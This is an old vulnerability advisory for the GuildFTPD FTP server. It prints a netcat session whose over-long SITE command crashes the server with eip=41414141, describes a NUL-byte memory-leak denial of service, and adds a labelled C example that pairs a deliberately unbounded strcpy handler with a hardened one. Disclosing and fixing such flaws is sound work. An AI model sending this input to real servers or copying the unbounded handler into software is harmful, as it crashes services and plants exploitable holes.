From:andreas junestam <andreas.junestam_(at)_defcom.com>
Date:29.05.2001
Subject:def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS

======================================================================
                 Defcom Labs Advisory def-2001-27

              GuildFTPD Buffer Overflow and Memory Leak DoS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-05-22
======================================================================
------------------------=[Brief Description]=-------------------------
GuildFTPD contains two different problems:
1. A buffer overrun in the SITE command handler that allows execution of
  arbitrary code
2. A memory leak in the input parsing code, usable for denial of service

------------------------=[Affected Systems]=--------------------------
- GuildFtpd v0.97 (probably earlier versions too)

----------------------=[Detailed Description]=------------------------
* SITE command Buffer Overflow
 All SITE commands are handled in a DLL (sitecmd.dll) that suffers from
 a buffer overflow. Sending a SITE command whose argument is longer than
 261 bytes overflows the buffer and gives control of eip (0x41414141 in
 the crash dump below), so arbitrary code can be executed. We have chosen
 not to include the working exploit.

 C:\>nc 127.0.0.1 21
 220-GuildFTPD FTP Server (c) 1999,2000
 220-Version 0.97
 220 Please enter your name:
 user a
 331 User name okay, Need password.
 pass a
 230 User logged in.
 site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 Access violation - code c0000005 (first chance)
 eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
 eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206

* Memory Leak DoS
 The input parsing code in GuildFTPD contains a memory leak that is
 triggered whenever a request contains a NUL (0x00) byte. GuildFTPD keeps
 answering new requests, but eventually the server runs out of memory and
 the machine crashes.
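
 The following is an added example, not GuildFTPD's code or Defcom's
 exploit: a C request handler written to avoid both defects described
 above. It places the unbounded copy pattern that the eip=41414141 crash
 points at beside a bounded SITE handler, and shows a parser that checks
 for an embedded 0x00 byte against the real request length and frees its
 working copy on every exit path. The 261-byte buffer size, the verbs, the
 reply texts and the probe requests are assumptions constructed for the
 example.

```c
/* Added example (not GuildFTPD's code): a request handler written to avoid
 * the two defects the advisory reports. Buffer size, verbs and reply texts
 * are assumptions; the unbounded handler is a hypothetical reconstruction. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The advisory says a SITE argument over 261 bytes overflows, so 261 is the
 * assumed size of the original buffer (260 characters plus terminator). */
#define SITE_ARG_MAX 261

static long g_live_allocs;            /* heap blocks process_request() holds */
long live_allocs(void) { return g_live_allocs; }

/* The pattern the crash dump points at: an unbounded copy into a fixed stack
 * buffer. Enough 'A's give eip=41414141 as in the advisory. Never call this
 * with untrusted input; it is here only for contrast. */
void handle_site_unbounded(const char *arg)
{
    char buf[SITE_ARG_MAX];
    strcpy(buf, arg);                 /* no length check */
    (void)buf;
}

/* Hardened form: refuse the argument before anything copies it. */
int handle_site_bounded(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    if (n >= outsz)
        return -1;                    /* caller answers 501 */
    memcpy(out, arg, n + 1);
    return 0;
}

/* Case-insensitive verb match (FTP verbs are case-insensitive). */
static int verb_is(const char *verb, const char *want)
{
    for (; *verb && *want; verb++, want++)
        if (toupper((unsigned char)*verb) != *want)
            return 0;
    return *verb == '\0' && *want == '\0';
}

/* Process one raw request of len bytes. Every exit path releases the working
 * copy, including the early rejection of an embedded 0x00, the kind of path
 * a parser leak typically sits on (assumption about the original). */
int process_request(const unsigned char *raw, size_t len,
                    char *reply, size_t replysz)
{
    int rc = -1;
    char *line, *sp, *arg = "";
    char sitebuf[SITE_ARG_MAX];

    if (len == 0 || len > 4096) {
        snprintf(reply, replysz, "500 Bad request length");
        return -1;
    }
    if ((line = malloc(len + 1)) == NULL) {
        snprintf(reply, replysz, "421 Out of memory");
        return -1;
    }
    g_live_allocs++;
    memcpy(line, raw, len);
    line[len] = '\0';

    /* strlen() stops at an embedded NUL, so check against the real length. */
    if (memchr(raw, 0, len) != NULL) {
        snprintf(reply, replysz, "500 Invalid character in command");
        goto out;
    }
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        line[--len] = '\0';
    if ((sp = strchr(line, ' ')) != NULL) {
        *sp = '\0';
        arg = sp + 1;
    }
    if (verb_is(line, "SITE")) {
        if (handle_site_bounded(arg, sitebuf, sizeof sitebuf) != 0) {
            snprintf(reply, replysz, "501 SITE argument too long");
            goto out;
        }
        snprintf(reply, replysz, "200 SITE %s accepted", sitebuf);
    } else {
        snprintf(reply, replysz, "200 %s accepted", line);
    }
    rc = 0;
out:
    free(line);                       /* single release point, no leak */
    g_live_allocs--;
    return rc;
}

/* Numeric reply code for one raw request (constructed input, see callers). */
int reply_code(const unsigned char *req, size_t len)
{
    char reply[512];
    process_request(req, len, reply, sizeof reply);
    return atoi(reply);
}

/* Constructed probe: "SITE " plus n bytes of 'A', as in the advisory's
 * session. Returns the numeric reply code. */
int probe_long_site(size_t n)
{
    unsigned char *req = malloc(n + 7);
    int code;
    if (req == NULL)
        return -1;
    memcpy(req, "SITE ", 5);
    memset(req + 5, 'A', n);
    memcpy(req + 5 + n, "\r\n", 2);
    code = reply_code(req, n + 7);
    free(req);
    return code;
}
```

 The probe functions replay the advisory's two inputs offline: a SITE
 argument of 300 bytes is answered with 501 instead of being copied, a
 request carrying an embedded 0x00 is answered with 500, and live_allocs()
 is zero afterwards. Against a live server the same two requests sent over
 nc, as in the session above, are the blackbox check: a disconnect or crash
 after the long SITE command, or steadily growing process memory after
 repeated NUL-bearing requests, reproduces the reported behaviour.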

---------------------------=[Workaround]=-----------------------------
None for the moment

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the developer's attention on the 24th of April
2001; no response so far.

======================================================================
           This release was brought to you by Defcom Labs UK

             labs@defcom.com             www.defcom.com
======================================================================
